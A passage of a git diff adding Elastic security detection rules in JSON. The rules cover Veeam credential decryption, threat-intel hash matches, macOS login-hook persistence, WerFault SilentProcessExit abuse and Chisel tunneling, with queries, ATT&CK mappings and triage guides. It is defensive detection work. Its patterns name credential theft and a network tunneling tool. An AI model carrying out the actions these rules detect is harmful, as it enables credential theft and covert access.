"tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 111 + }, + "id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_1.json b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_1.json new file mode 100644 index 00000000000..28385709480 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_1.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential credential decrypt operations by PowerShell or unsigned processes using the Veeam.Backup.Common.dll library. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Veeam Backup Library Loaded by Unusual Process", + "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n (dll.name : \"Veeam.Backup.Common.dll\" or dll.pe.original_file_name : \"Veeam.Backup.Common.dll\") and\n (\n process.code_signature.trusted == false or\n process.code_signature.exists == false or\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aaab30ec-b004-4191-95e1-4a14387ef6a6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "aaab30ec-b004-4191-95e1-4a14387ef6a6_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_2.json b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_2.json new file mode 100644 index 00000000000..e262b7d8fe3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aaab30ec-b004-4191-95e1-4a14387ef6a6_2.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential credential decrypt operations by PowerShell or unsigned processes using the Veeam.Backup.Common.dll library. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Veeam Backup Library Loaded by Unusual Process", + "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n (dll.name : \"Veeam.Backup.Common.dll\" or dll.pe.original_file_name : \"Veeam.Backup.Common.dll\") and\n (\n process.code_signature.trusted == false or\n process.code_signature.exists == false or\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aaab30ec-b004-4191-95e1-4a14387ef6a6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "aaab30ec-b004-4191-95e1-4a14387ef6a6_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_7.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_7.json new file mode 100644 index 00000000000..d278ace0473 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_7.json @@ -0,0 +1,209 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when a hash indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains file hashes, such as antivirus alerts, process creation, library load, and file operation events.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel Hash Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.hash.*", + "type": "unknown" + }, + { + "ecs": false, + "name": "file.hash.*", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.hash.*", + "type": "unknown" + } + ], + "risk_score": 99, + "rule_id": "aab184d3-72b3-4639-b242-6597c99d8bca", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "file.hash.md5", + "type": "mapping", + "value": "threat.indicator.file.hash.md5" + } + ] + }, + { + "entries": [ + { + "field": "file.hash.sha1", + "type": "mapping", + "value": "threat.indicator.file.hash.sha1" + } + ] + }, + { + "entries": [ + { + "field": "file.hash.sha256", + "type": "mapping", + "value": "threat.indicator.file.hash.sha256" + } + ] + }, + { + "entries": [ + { + "field": "dll.hash.md5", + "type": "mapping", + "value": "threat.indicator.file.hash.md5" + } + ] + }, + { + "entries": [ + { + "field": "dll.hash.sha1", + "type": "mapping", + "value": "threat.indicator.file.hash.sha1" + } + ] + }, + { + "entries": [ + { + "field": "dll.hash.sha256", + "type": "mapping", + "value": "threat.indicator.file.hash.sha256" + } + ] + }, + { + "entries": [ + { + "field": "process.hash.md5", + "type": "mapping", + "value": "threat.indicator.file.hash.md5" + } + ] + }, + { + "entries": [ + { + "field": "process.hash.sha1", + "type": "mapping", + "value": "threat.indicator.file.hash.sha1" + } + ] + }, + { + "entries": [ + { + "field": "process.hash.sha256", + "type": "mapping", + "value": "threat.indicator.file.hash.sha256" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 7 + }, + "id": "aab184d3-72b3-4639-b242-6597c99d8bca_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_107.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_107.json new file mode 100644 index 00000000000..1e9f1c090b4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_107.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of the login window property list (plist). Adversaries may modify plist files to run a program during system boot or user login for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence via Login Hook", + "note": "## Triage and analysis\n\nStarting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. This can be abused to establish or maintain persistence on a compromised system.", + "query": "event.category:file and host.os.type:macos and not event.type:\"deletion\" and\n file.name:\"com.apple.loginwindow.plist\" and\n process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor or backupd or \"iMazing Profile Editor\"\n))\n", + "references": [ + "https://github.com/D00MFist/PersistentJXA/blob/master/LoginScript.js" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac412404-57a5-476f-858f-4e8fbb4f48d8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1647", + "name": "Plist File Modification", + "reference": "https://attack.mitre.org/techniques/T1647/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 107 + }, + "id": "ac412404-57a5-476f-858f-4e8fbb4f48d8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_111.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_111.json new file mode 100644 index 00000000000..ce89d26eb79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_111.json @@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes.", + "false_positives": [ + "Custom Windows error reporting debugger or applications restarted by WerFault after a crash." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WerFault Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"WerFault.exe\" and \n \n /* args -s and -t used to execute a process via SilentProcessExit mechanism */\n (process.parent.args : \"-s\" and process.parent.args : \"-t\" and process.parent.args : \"-c\") and \n \n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\Initcrypt.exe\", \"?:\\\\Program Files (x86)\\\\Heimdal\\\\Heimdal.Guard.exe\")\n", + "references": [ + "https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/", + "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx", + "http://web.archive.org/web/20230530011556/https://blog.menasec.net/2021/01/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_112.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_112.json new file mode 100644 index 00000000000..20a8f6e5540 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_112.json @@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes.", + "false_positives": [ + "Custom Windows error reporting debugger or applications restarted by WerFault after a crash." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WerFault Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"WerFault.exe\" and \n \n /* args -s and -t used to execute a process via SilentProcessExit mechanism */\n (process.parent.args : \"-s\" and process.parent.args : \"-t\" and process.parent.args : \"-c\") and \n \n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\Initcrypt.exe\", \"?:\\\\Program Files (x86)\\\\Heimdal\\\\Heimdal.Guard.exe\")\n", + "references": [ + "https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/", + "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx", + "http://web.archive.org/web/20230530011556/https://blog.menasec.net/2021/01/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.012", + "name": "Image File Execution Options Injection", + "reference": "https://attack.mitre.org/techniques/T1546/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_5.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_5.json new file mode 100644 index 00000000000..db941bc0f27 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_5.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Chisel Server", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Chisel Server\n\nAttackers can leverage `chisel` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for a sequence of command line arguments that are consistent with `chisel` server tunneling behavior, followed by a network event by an uncommon process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT 